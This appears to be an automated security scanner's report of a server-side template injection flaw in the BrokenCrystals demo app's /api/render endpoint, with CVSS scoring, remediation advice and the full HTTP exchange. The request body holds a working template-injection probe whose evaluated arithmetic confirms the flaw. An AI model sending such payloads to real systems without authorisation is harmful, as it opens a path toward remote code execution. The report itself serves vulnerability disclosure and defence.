
SSTI - Server Side Template Injection #10

Description

@bright-security

SSTI - Server Side Template Injection

Severity: High Discovered: 10 October 2022, 11:12 PM

CWE ID

CWE-74

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Details

SSTI (Server Side Template Injection) is a vulnerability in which malformed user input is embedded into a server-side template without proper validation, so the template engine evaluates it. Its most serious consequence is that it can open a path to remote code execution, which malicious actors can exploit. The vulnerability can be identified by submitting invalid template syntax in the input and observing the error messages displayed in the resulting response.

Possible exposure

Execute Unauthorized Code or Commands

Remediation suggestions

To protect against this type of attack, validate input before passing it to a template directive, and evaluate templates in a safe environment.

Request

POST https://brokencrystals.com/api/render HTTP/1.1
Accept: application/json, text/plain, */*
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Content-Type: text/plain
Cookie: bc-calls-counter=1665443548282; connect.sid=wi7k_QEXSv2mytpWaTKNyd_1wk1LQvfh.HhvHOpsekTEV3vmOg45ZU0IvN%2BxQF2Ub1xmmkjpeDiI
Accept-Encoding: identity
Content-Length: 56

{{="+1"}} {{=5589}} {{=55488}} {{=55}}{{=518794+564180}}

Response

HTTP/1.1 201
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:12:28 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 23
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443548314
Cache-Control: public, max-age=99999

+1 5589 55488 551082974
